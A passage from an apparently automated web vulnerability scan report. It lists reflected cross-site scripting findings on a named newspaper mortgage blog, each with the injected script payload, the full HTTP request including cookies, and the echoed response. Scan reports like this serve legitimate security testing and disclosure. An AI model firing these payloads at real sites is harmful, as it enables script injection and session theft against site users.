1.306. http://mortgage.ocregister.com/2009/09/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2009/09/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e4e9"><script>alert(1)</script>62c20fd5f6c was submitted in the REST URL parameter 1. This input was echoed as 3e4e9\"><script>alert(1)</script>62c20fd5f6c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /20093e4e9"><script>alert(1)</script>62c20fd5f6c/09/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:13:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:13:17 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62655

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/20093e4e9\"><script>alert(1)</script>62c20fd5f6c/09/feed/" />
...[SNIP]...

1.307. http://mortgage.ocregister.com/2009/09/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2009/09/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43615"><script>alert(1)</script>66b5d481b5d was submitted in the REST URL parameter 2. This input was echoed as 43615\"><script>alert(1)</script>66b5d481b5d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2009/0943615"><script>alert(1)</script>66b5d481b5d/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:13:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:13:21 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62651

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009/0943615\"><script>alert(1)</script>66b5d481b5d/feed/" />
...[SNIP]...

1.308. http://mortgage.ocregister.com/2009/09/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2009/09/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fef8a"><script>alert(1)</script>5f63aeef702 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fef8a\"><script>alert(1)</script>5f63aeef702 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2009/09/?fef8a"><script>alert(1)</script>5f63aeef702=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:13:11 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 97531

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2009 September - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009/09/?fef8a\"><script>alert(1)</script>5f63aeef702=1feed/" />
...[SNIP]...

1.309. http://mortgage.ocregister.com/2009/10/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2009/10/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 766d2"><script>alert(1)</script>feecef77490 was submitted in the REST URL parameter 1. This input was echoed as 766d2\"><script>alert(1)</script>feecef77490 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2009766d2"><script>alert(1)</script>feecef77490/10/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:13:36 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:13:36 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009766d2\"><script>alert(1)</script>feecef77490/10/feed/" />
...[SNIP]...

1.310. http://mortgage.ocregister.com/2009/10/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2009/10/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95802"><script>alert(1)</script>54504d64364 was submitted in the REST URL parameter 2. This input was echoed as 95802\"><script>alert(1)</script>54504d64364 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2009/1095802"><script>alert(1)</script>54504d64364/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:13:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:13:50 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62643

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009/1095802\"><script>alert(1)</script>54504d64364/feed/" />
...[SNIP]...

1.311. http://mortgage.ocregister.com/2009/10/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2009/10/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef3c3"><script>alert(1)</script>f4108a4af6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ef3c3\"><script>alert(1)</script>f4108a4af6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2009/10/?ef3c3"><script>alert(1)</script>f4108a4af6=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:13:11 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 108827

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2009 October - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009/10/?ef3c3\"><script>alert(1)</script>f4108a4af6=1feed/" />
...[SNIP]...

1.312. http://mortgage.ocregister.com/2009/11/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2009/11/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39ed8"><script>alert(1)</script>ab1683ae201 was submitted in the REST URL parameter 1. This input was echoed as 39ed8\"><script>alert(1)</script>ab1683ae201 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /200939ed8"><script>alert(1)</script>ab1683ae201/11/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:13:00 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:13:01 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62653

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/200939ed8\"><script>alert(1)</script>ab1683ae201/11/feed/" />
...[SNIP]...

1.313. http://mortgage.ocregister.com/2009/11/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2009/11/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e730d"><script>alert(1)</script>71e0e703e3e was submitted in the REST URL parameter 2. This input was echoed as e730d\"><script>alert(1)</script>71e0e703e3e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2009/11e730d"><script>alert(1)</script>71e0e703e3e/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:13:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:13:04 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62653

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009/11e730d\"><script>alert(1)</script>71e0e703e3e/feed/" />
...[SNIP]...

1.314. http://mortgage.ocregister.com/2009/11/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2009/11/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84d57"><script>alert(1)</script>16d0da66f08 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 84d57\"><script>alert(1)</script>16d0da66f08 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2009/11/?84d57"><script>alert(1)</script>16d0da66f08=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 105718

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2009 November - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009/11/?84d57\"><script>alert(1)</script>16d0da66f08=1feed/" />
...[SNIP]...

1.315. http://mortgage.ocregister.com/2009/12/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2009/12/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce109"><script>alert(1)</script>3534b7ba531 was submitted in the REST URL parameter 1. This input was echoed as ce109\"><script>alert(1)</script>3534b7ba531 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2009ce109"><script>alert(1)</script>3534b7ba531/12/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:13:00 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:13:02 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009ce109\"><script>alert(1)</script>3534b7ba531/12/feed/" />
...[SNIP]...

1.316. http://mortgage.ocregister.com/2009/12/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2009/12/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1391f"><script>alert(1)</script>20503540395 was submitted in the REST URL parameter 2. This input was echoed as 1391f\"><script>alert(1)</script>20503540395 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2009/121391f"><script>alert(1)</script>20503540395/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:13:04 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:13:04 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009/121391f\"><script>alert(1)</script>20503540395/feed/" />
...[SNIP]...

1.317. http://mortgage.ocregister.com/2009/12/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2009/12/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7488"><script>alert(1)</script>f79a6b90c3f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c7488\"><script>alert(1)</script>f79a6b90c3f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2009/12/?c7488"><script>alert(1)</script>f79a6b90c3f=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:55 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 96657

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2009 December - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009/12/?c7488\"><script>alert(1)</script>f79a6b90c3f=1feed/" />
...[SNIP]...

1.318. http://mortgage.ocregister.com/2010/01/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2010/01/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 935fb"><script>alert(1)</script>77d498ba61a was submitted in the REST URL parameter 1. This input was echoed as 935fb\"><script>alert(1)</script>77d498ba61a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010935fb"><script>alert(1)</script>77d498ba61a/01/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:12:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:12:52 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62652

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010935fb\"><script>alert(1)</script>77d498ba61a/01/feed/" />
...[SNIP]...

1.319. http://mortgage.ocregister.com/2010/01/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2010/01/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9d7d"><script>alert(1)</script>ca8ccf11586 was submitted in the REST URL parameter 2. This input was echoed as d9d7d\"><script>alert(1)</script>ca8ccf11586 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/01d9d7d"><script>alert(1)</script>ca8ccf11586/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:12:55 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:12:55 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62653

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010/01d9d7d\"><script>alert(1)</script>ca8ccf11586/feed/" />
...[SNIP]...

1.320. http://mortgage.ocregister.com/2010/01/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2010/01/

Issue detail

